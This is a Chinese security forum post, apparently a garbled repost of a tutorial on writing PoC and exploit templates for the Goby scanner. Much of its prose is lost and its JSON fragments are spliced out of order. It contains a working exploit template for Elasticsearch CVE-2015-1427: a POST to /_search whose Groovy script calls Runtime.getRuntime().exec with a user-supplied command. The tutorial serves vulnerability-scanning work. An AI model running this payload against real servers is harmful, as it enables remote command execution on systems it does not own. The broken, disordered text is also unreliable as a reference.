设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 护网 [17838] 2021-04-15_技术分享如何编写合格的PoC领取Goby ...
返回列表 发新帖
查看: 0|回复: 0

[17838] 2021-04-15_技术分享如何编写合格的PoC领取Goby红队专版

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 5 天前 | 显示全部楼层 |阅读模式
2021-04-15_技术分享如何编写合格的PoC领取Goby红队专版   |     P o C     G o b y     z h z y k e r   G o b y S e c   2 0 2 1 - 0 4 - 1 5 #   , 3 # G o b y     , 1 G o b y 1 3   3 9 0 6         1 0   G o b y t o p 1 0 G o b y G o b y   P o C     0 1   G o b y P o C 便 . . . P o C P o C 线   P o C
G o b y h t t p s : / / g i t h u b . c o m / g o b y s e c / G o b y / w i k i / V u l n e r a b i l i t y - w r i t i n g - g u i d e G o b y P o C h t t p s : / / s h i m o . i m / s h e e t s / h c o I p i k M z p s V K g a C / a o j n O /   0 2   G o b y     P o C 2 . 1     P o C  
P o C G o b y R e q u e s t s R e s p o n s e G o b y R e q u e s t s C V E - 2 0 1 5 - 1 4 2 7 R C E R e q u e s t s
G o b y P o C R e q u e s t s A N D O R 便 R e q u e s t s R e s p o n s e H e a d e r B o d y C V E - 2 0 1 5 - 1 4 2 7 R e q u e s t s R C E 便
R e q u e s t s R C E P o C i p q u e r y q u e r y R e s p o n s e 怀 P o C R e q u e s t s R e q u e s t s P o C W i r e s h a r k P o C G o b y
2 . 2   P o C E x p P o C E x p P o C E x p E x p G o b y E x p T P d e m o d e m o E x p E x p E x p P o C j s o n H a s E x p f a l s e t r u e E x p P a r a m s   E x p   C V E - 2 0 1 5 - 1 4 2 7 E x p P a r a m s j s o n " E x p P a r a m s " :   [         {             " n a m e " :   " c m d " ,             " t y p e " :   " i n p u t " ,             " v a l u e " :   " w h o a m i "         }     ]
G U I E x p j s o n E x p l o i t S t e p s n u l l C V E - 2 0 1 5 - 1 4 2 7 R e q u e s t s " E x p l o i t S t e p s " :   [         " A N D " ,         {             " R e q u e s t " :   {                 " m e t h o d " :   " P O S T " ,                 " u r i " :   " / w e b s i t e / b l o g / " ,                 " f o l l o w _ r e d i r e c t " :   t r u e ,                 " h e a d e r " :   {                     " A c c e p t - E n c o d i n g " :   " g z i p ,   d e f l a t e " ,                     " A c c e p t " :   " * / * " ,                     " C o n n e c t i o n " :   " c l o s e " ,                     " A c c e p t - L a n g u a g e " :   " e n " ,                     " C o n t e n t - T y p e " :   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "                 } ,                 " d a t a _ t y p e " :   " t e x t " ,                 " d a t a " :   " {   " n a m e " :   " c v e - 2 0 1 5 - 1 4 2 7 "   } "             } ,             " R e s p o n s e T e s t " :   {                 " t y p e " :   " g r o u p " ,                 " o p e r a t i o n " :   " A N D " ,                 " c h e c k s " :   [                     {                         " t y p e " :   " i t e m " ,                         " v a r i a b l e " :   " $ c o d e " ,                         " o p e r a t i o n " :   " = = " ,                         " v a l u e " :   " 2 0 1 " ,                         " b z " :   " "                     }                 ]             } ,             " S e t V a r i a b l e " :   [                 " o u t p u t | l a s t b o d y "             ]         } ,         {             " R e q u e s t " :   {                 " m e t h o d " :   " P O S T " ,                 " u r i " :   " / _ s e a r c h ? p r e t t y " ,                 " f o l l o w _ r e d i r e c t " :   t r u e ,                 " h e a d e r " :   {                     " A c c e p t - E n c o d i n g " :   " g z i p ,   d e f l a t e " ,                     " A c c e p t " :   " * / * " ,                     " C o n n e c t i o n " :   " c l o s e " ,                     " A c c e p t - L a n g u a g e " :   " e n " ,                     " C o n t e n t - T y p e " :   " a p p l i c a t i o n / t e x t "                 } ,                 " d a t a _ t y p e " :   " t e x t " ,                 " d a t a " :   " { " s i z e " : 1 ,   " s c r i p t _ f i e l d s " :   { " l u p i n " : { " l a n g " : " g r o o v y " , " s c r i p t " :   " j a v a . l a n g . M a t h . c l a s s . f o r N a m e ( " j a v a . l a n g . R u n t i m e " ) . g e t R u n t i m e ( ) . e x e c ( " { { { c m d } } } "             } ,             " R e s p o n s e T e s t " :   {                 " t y p e " :   " g r o u p " ,                 " o p e r a t i o n " :   " A N D " ,                 " c h e c k s " :   [                     {                         " t y p e " :   " i t e m " ,                         " v a r i a b l e " :   " $ c o d e " ,                         " o p e r a t i o n " :   " = = " ,                         " v a l u e " :   " 2 0 0 " ,
j s o n   R e q u e s t s   P o C S c a n S t e p s R e q u e s t s   S c a n S t e p s E x p l o i t S t e p s j s o n R e q u e s t s R e s p o n s e T e s t S e t V a r i a b l e B o d y E x p   d e m o T P R C E R e s p o n s e T e s t R e q u e s t s @ g o 0 p R e s p o n s e T e s t R C E T P d e m o S e t V a r i a b l e : B o d y S e t V a r i a b l e r e g e x E x p P o C P o C w i r e s h a r k P o C P o C h t t p s : / / g i t h u b . c o m / z h z y k e r / G o b y - P o C                         " v a l u e " :   " 2 0 0 " ,                         " b z " :   " "                     } ,                     {                         " t y p e " :   " i t e m " ,                         " v a r i a b l e " :   " $ b o d y " ,                         " o p e r a t i o n " :   " c o n t a i n s " ,                         " v a l u e " :   " 4 6 0 f 7 c c b 5 8 3 e 2 5 e 0 9 c 0 f e 1 0 0 a 2 c 9 e 9 0 d " ,                         " b z " :   " "                     }                 ]             } ,             " S e t V a r i a b l e " :   [                 " o u t p u t | l a s t b o d y | r e g e x | ( ? s ) " l u p i n "   :   [   " ( . * ) "   ] "             ]         }     ] " E x p l o i t S t e p s " :   [         " A N D " ,         {             " R e q u e s t " :   { x x x x x x } ,             " R e s p o n s e T e s t " :   { x x x x x x } ,             " S e t V a r i a b l e " :   [ x x x x x x ]         } ,         {             " R e q u e s t " :   { x x x x x x } ,             " R e s p o n s e T e s t " :   { x x x x x x } ,             " S e t V a r i a b l e " :   [ x x x x x x ]         }     ] " S e t V a r i a b l e " :   [                 " o u t p u t | l a s t b o d y "             ] " S e t V a r i a b l e " :   [                 " o u t p u t | l a s t b o d y | r e g e x | ( ? s ) " l u p i n "   :   [   " ( . * ) "   ] "             ]
  0 3 E x p P o C G o b y ~ ~ G o b y 使 使   l i m b 0   |   G o b y h v v     |   A p a c h e   T o m c a t s e s s i o n   k i o   |   G o b y   b y t e s e c   |   O A - a j a x . d o   z z l y z q   |   G o b y   > >     / G o b y   / / / / /   P o C   稿 ~ ~ ~
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:25 , Processed in 0.710300 second(s), 31 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表